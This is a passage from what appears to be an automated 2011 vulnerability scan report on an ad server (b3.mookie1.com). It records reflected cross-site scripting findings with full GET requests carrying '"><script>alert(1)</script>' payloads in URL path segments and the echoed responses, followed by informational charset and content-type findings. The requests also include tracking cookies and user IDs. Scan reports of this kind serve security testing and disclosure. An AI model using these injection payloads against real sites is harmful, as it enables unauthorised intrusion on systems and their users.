Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 394
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/ATTW/RTB_11Q36d4b9"><script>alert(1)</script>128efcae1a/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/2049455357/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.13. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e390"><script>alert(1)</script>100d6cc6b90 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG7e390"><script>alert(1)</script>100d6cc6b90/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG7e390"><script>alert(1)</script>100d6cc6b90/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/1218315932/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.14. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3a6b"><script>alert(1)</script>a0c2c728d97 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728c3a6b"><script>alert(1)</script>a0c2c728d97/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728c3a6b"><script>alert(1)</script>a0c2c728d97/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/90081768/x90/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

1.15. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51505"><script>alert(1)</script>cd8f0da8f39 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x9051505"><script>alert(1)</script>cd8f0da8f39 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 387
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3/1760490938/x9051505"><script>alert(1)</script>cd8f0da8f39/default/empty.gif/4d686437616b354e4751554144437267?x" target="_top">
...[SNIP]...

2. HTML does not specify charset  previous  next
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


2.1. http://b3.mookie1.com/2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90

Request

GET /2/247B3/ATT/DemGen_11Q3/BBN_Di/728/1269004436@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.adweek.com/news/television/tweets-rate-abc-cw-tops-fall-134203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFW=011Qob4w7106bN5; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 508
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATT=247B3;expires="+B3d.toGMTString()+";path=/;doma
...[SNIP]...

2.2. http://b3.mookie1.com/2/B3DM/DLX/1@x71  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1417893429@x23?USNetwork/ATT_DemGen_11Q3_247_BBN_Di_728
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1931
Content-Type: text/html

<html><head></head><body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,
...[SNIP]...

2.3. http://b3.mookie1.com/2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90

Request

GET /2/ZapTraderB3/ATTW/RTB_11Q3/LEG_RTG/728/1eb79ff32-26c1-4fc4-8ff1-b820ea1deed3@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://tracker.bidder7.mookie1.com/tr-apx?cb=1313675488&a=eb79ff32-26c1-4fc4-8ff1-b820ea1deed3&b=1&c=10000470&cr=1222&p=2.629213&u=3539656946931560696&z=-05:00&d=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; CapellaUniversity=247B3; ATTW=247B3; RMFM=011QsyqkU10MEI; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; ATT=247B3; dlx_20100929=set; other_20110126=set; dlx_XXX=set; id=211111708350353; mdata=1|211111708350353|1313102888

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 13:51:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 238
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTW=ZapTraderB3;expires="+B3d.toGMTString()+";path
...[SNIP]...

3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: id=2040695539456590; OAX=Mhd7ak45SYsADCcs; SAP=fastcompany; RMFL=011QqFEqU103Xq|U103zF; NXCLICK2=011QqFEuNX_Nonsecure!y!B3!3Xq!4qrNX_TRACK_Atandtwireless/Homepage_NX_Nonsecure!y!B3!3zF!5IxNX_TRACK_Atandtwireless/RTB_Retargeting_NX_Nonsecure!y!B3!gA!14l; ATTWL=ZapTraderB3; mdata=1|2040695539456590|1313431890; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 14:25:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 13 Oct 2010 18:42:29 GMT
ETag: "2000223-1cee-49283f49acf40"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

Report generated by XSS.CX at Thu Aug 18 08:26:27 GMT-06:00 2011.